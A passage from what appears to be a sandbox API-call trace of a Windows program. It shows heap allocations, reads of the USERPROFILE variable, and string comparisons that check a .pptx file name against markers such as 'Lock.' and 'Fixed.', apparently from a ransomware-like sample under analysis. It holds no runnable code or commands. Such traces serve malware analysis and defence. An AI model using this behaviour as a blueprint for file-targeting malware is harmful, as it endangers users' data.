returned 0x2aab008 [0215.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cyaer-G0v.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yaer-G0v.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aer-G0v.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er-G0v.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r-G0v.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-G0v.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G0v.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0v.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.354] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0215.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0215.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0215.354] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0215.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0215.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0215.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0215.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0215.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0215.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0215.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1e) returned 0x2a77f30 [0215.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0215.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cyaer-G0v.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yaer-G0v.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aer-G0v.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er-G0v.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r-G0v.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-G0v.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G0v.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0v.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0215.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0215.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0215.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0215.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0215.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0215.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0215.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0215.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0215.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0215.356] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0215.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0215.356] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0215.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0215.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0215.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b48 [0215.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0215.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0215.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0215.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.356] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0215.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0215.357] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf30 [0215.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab068 [0215.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0215.357] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0215.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0215.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0215.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0215.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0215.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854218 [0215.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0215.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0215.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0215.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0215.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0215.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0215.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0215.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b58 [0215.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0215.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0215.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0215.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0215.358] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab128 [0215.358] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.358] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf30 [0215.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0215.359] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0215.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0215.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0215.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0215.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0215.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0215.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854998 [0215.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0215.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.359] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.359] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0215.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0215.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0215.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a88 [0215.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0215.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0215.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a38 [0215.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0215.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab110 [0215.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0215.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0215.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0215.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0215.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0215.360] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0215.360] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0215.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0215.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0215.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0215.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0215.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0215.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0215.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0215.361] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0215.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0215.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0215.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.361] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0215.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0215.361] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0215.362] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0215.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0215.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0215.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf00 | out: hHeap=0x2af0000) returned 1 [0215.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0215.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0215.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0215.362] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0215.362] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0215.362] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0215.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0215.362] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) 